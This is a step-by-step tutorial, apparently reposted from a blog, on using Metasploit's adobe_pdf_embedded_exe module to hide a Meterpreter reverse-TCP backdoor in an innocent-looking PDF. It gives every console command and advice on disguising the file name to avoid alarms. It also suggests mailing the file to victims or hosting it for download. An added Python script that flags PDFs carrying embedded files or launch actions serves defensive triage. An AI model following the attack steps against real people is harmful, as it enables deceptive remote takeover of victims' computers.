How to Embed a Backdoor Connection in an Innocent-Looking PDF




Step 1: Find the Appropriate Exploit



First, let's find the appropriate exploit by searching Metasploit for one that will use this version of Adobe Reader:

msf > search type:exploit platform:windows adobe pdf




Metasploit lists all the exploits that meet our criteria. Let's use "exploit/windows/fileformat/adobe_pdf_embedded_exe".

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe


Step 2: Gather Info on This Exploit


Now let's take a look at the information available to us about this exploit:

msf exploit(adobe_pdf_embedded_exe) > info






Note that in the description, Metasploit tells us that it embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack. In addition to sending it to the victim, one can also embed it into a website inviting the unsuspecting victim to download it.

Step 3: Set Our Payload


In our next step, we need to set our payload to embed into the PDF. Type:

msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp



Step 4: Set Options


Now that we have chosen our exploit and set our payload, the only thing left to do is to set our options. Let's take a look at the options for this exploit and payload by typing:

msf exploit(adobe_pdf_embedded_exe) > show options








As the options output shows, Metasploit requires us to provide an existing PDF where it can embed the Meterpreter.

Let's set a file named chapter1.pdf, presumably some class notes (make certain that this file was created with Reader 9 or earlier), to our INFILENAME option.

msf exploit(adobe_pdf_embedded_exe) > set INFILENAME chapter1.pdf

Then change the default FILENAME of the output file with the embedded Meterpreter to the same innocuous-sounding chapter1.pdf. The default name is evil.pdf, but that is likely to set off too many alarms.

msf exploit(adobe_pdf_embedded_exe) > set FILENAME chapter1.pdf

Then, set the LHOST (our system) to our IP address, in this case 192.168.100.1.

msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.100.1



Step 5: Double Check the Settings


Now, let's check our options again to see whether everything is ready to go.

msf exploit(adobe_pdf_embedded_exe) > show options






Step 6: Exploit!


All our options are set; all we need to do now is exploit.

msf exploit(adobe_pdf_embedded_exe) > exploit

Metasploit has created a PDF named chapter1.pdf that contains the Meterpreter listener. Metasploit has placed this file at /root/.msf4/local/chapter1.pdf.
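
From the defender's side, a file built this way is an ordinary PDF that additionally carries an embedded file, so a mail or web gateway can triage on the PDF names involved. The following is an added example, not part of the original post or of Metasploit; the watched-name list, the verdict labels and the sample bytes are assumptions made for illustration.

```python
import re

# Names to flag during triage. The list is this example's assumption: the PDF
# specification's names for embedded files and for actions that can start
# something when the document is opened.
WATCHED = ("EmbeddedFile", "EmbeddedFiles", "Launch", "OpenAction", "AA",
           "JavaScript", "JS")

# A PDF name is "/" followed by characters up to whitespace or a delimiter.
_NAME = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> str:
    """Undo #xx escapes so that /L#61unch is counted as Launch."""
    return _HEX.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def count_names(data: bytes) -> dict:
    """Count watched names in the raw bytes (compressed object streams are
    not inflated here, so names hidden inside them are not seen)."""
    counts = dict.fromkeys(WATCHED, 0)
    for m in _NAME.finditer(data):
        name = decode_name(m.group(1))
        if name in counts:
            counts[name] += 1
    return counts


def triage(data: bytes) -> str:
    """Return 'not-a-pdf', 'pass', 'review' or 'quarantine'."""
    if b"%PDF-" not in data[:1024]:
        return "not-a-pdf"
    c = count_names(data)
    embedded = c["EmbeddedFile"] + c["EmbeddedFiles"]
    if embedded and c["Launch"]:
        return "quarantine"   # carries a file and an action that can run a program
    if embedded or any(c[k] for k in ("Launch", "OpenAction", "AA", "JavaScript", "JS")):
        return "review"
    return "pass"


# Constructed samples (no payload, just object skeletons).
BENIGN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n%%EOF\n"
SUSPECT = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 3 0 R "
           b"/Names << /EmbeddedFiles 4 0 R >> >>\nendobj\n"
           b"3 0 obj\n<< /S /L#61unch >>\nendobj\n%%EOF\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, triage(sample), count_names(sample))
```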

Reference
http://www.blackhat-sec.com/2014/10/how-to-backdoor-pdfs.html.
